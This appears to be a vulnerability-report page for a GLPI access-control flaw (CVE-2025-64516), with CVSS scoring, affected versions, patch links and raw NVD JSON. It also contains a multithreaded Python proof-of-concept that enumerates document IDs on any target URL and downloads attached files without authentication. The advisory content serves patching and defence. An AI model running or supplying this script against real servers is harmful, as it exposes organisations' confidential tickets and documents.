Security Vulnerability Report
CVE-2025-64516 CVSS 7.5 HIGH

CVE-2025-64516

Published: 2026-01-15 16:16:11
Last Modified: 2026-01-21 20:53:37

Description

GLPI is a free asset and IT management software package. Prior to 10.0.21 and 11.0.3, an unauthorized user can access GLPI documents attached to any item (ticket, asset, ...). If the public FAQ is enabled, this unauthorized access can be performed by an anonymous user. This vulnerability is fixed in 10.0.21 and 11.0.3.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* - VULNERABLE (GLPI < 10.0.21)
cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* - VULNERABLE (GLPI < 11.0.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64516 PoC - GLPI Unauthenticated Document Access
# This PoC demonstrates IDOR vulnerability in GLPI document access
import requests
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed


def check_glpi_version(url):
    """Check if target is running vulnerable GLPI version"""
    try:
        response = requests.get(url + '/', timeout=10)
        if 'GLPI' in response.text:
            return True
    except:
        pass
    return False


def download_document(base_url, doc_id):
    """Attempt to download document by ID without authentication"""
    # Common GLPI document endpoints
    endpoints = [
        f'{base_url}/front/document.send.php?docid={doc_id}',
        f'{base_url}/ajax/getFile.php?docid={doc_id}',
        f'{base_url}/files/_dumps/{doc_id}',
    ]
    for endpoint in endpoints:
        try:
            response = requests.get(endpoint, timeout=10, allow_redirects=True)
            # Check if we got actual file content (not login page)
            if response.status_code == 200:
                content_type = response.headers.get('Content-Type', '')
                if 'text/html' not in content_type and len(response.content) > 0:
                    print(f'[+] SUCCESS: Downloaded document ID {doc_id}')
                    print(f' Endpoint: {endpoint}')
                    print(f' Size: {len(response.content)} bytes')
                    print(f' Content-Type: {content_type}')
                    return True
        except Exception as e:
            continue
    return False


def exploit(target_url, start_id=1, end_id=1000, threads=10):
    """Main exploitation function"""
    print(f'[*] Target: {target_url}')
    print(f'[*] Scanning document IDs from {start_id} to {end_id}')
    print(f'[*] Using {threads} threads')
    print('-' * 60)
    with ThreadPoolExecutor(max_workers=threads) as executor:
        futures = {executor.submit(download_document, target_url, doc_id): doc_id
                   for doc_id in range(start_id, end_id + 1)}
        for future in as_completed(futures):
            try:
                result = future.result()
            except Exception as e:
                pass


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-64516.py <target_url> [start_id] [end_id]')
        print('Example: python cve-2025-64516.py http://target.com/glpi 1 1000')
        sys.exit(1)
    target = sys.argv[1].rstrip('/')
    start = int(sys.argv[2]) if len(sys.argv) > 2 else 1
    end = int(sys.argv[3]) if len(sys.argv) > 3 else 1000
    exploit(target, start, end)

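References

https://github.com/glpi-project/glpi/commit/51412a89d3174cfe22967b051d527febdbceab3c (Patch)
https://github.com/glpi-project/glpi/commit/ee7ee28e0645198311c0a9e0c4e4b712b8788e27 (Patch)
https://github.com/glpi-project/glpi/releases/tag/10.0.21 (Release Notes)
https://github.com/glpi-project/glpi/releases/tag/11.0.3 (Release Notes)
https://github.com/glpi-project/glpi/security/advisories/GHSA-487h-7mxm-7r46 (Vendor Advisory)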

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64516", "sourceIdentifier": "[email protected]", "published": "2026-01-15T16:16:11.487", "lastModified": "2026-01-21T20:53:37.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GLPI is a free asset and IT management software package. Prior to 10.0.21 and 11.0.3, an unauthorized user can access GLPI documents attached to any item (ticket, asset, ...). If the public FAQ is enabled, this unauthorized access can be performed by an anonymous user. This vulnerability is fixed in 10.0.21 and 11.0.3."}, {"lang": "es", "value": "GLPI es un paquete de software gratuito de gestión de activos y TI. Antes de 10.0.21 y 11.0.3, un usuario no autorizado puede acceder a documentos de GLPI adjuntos a cualquier elemento (ticket, activo, ...). Si la FAQ pública está habilitada, este acceso no autorizado puede ser realizado por un usuario anónimo. Esta vulnerabilidad está corregida en 10.0.21 y 11.0.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.0.21", "matchCriteriaId": "71497A1A-8C87-48D5-9BA2-CFFF057BC3A7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.3", "matchCriteriaId": "A9EA5DDA-E0E7-4530-B266-309AF584D327"}]}]}], "references": [{"url": "https://github.com/glpi-project/glpi/commit/51412a89d3174cfe22967b051d527febdbceab3c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/glpi-project/glpi/commit/ee7ee28e0645198311c0a9e0c4e4b712b8788e27", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/glpi-project/glpi/releases/tag/10.0.21", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/glpi-project/glpi/releases/tag/11.0.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/glpi-project/glpi/security/advisories/GHSA-487h-7mxm-7r46", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}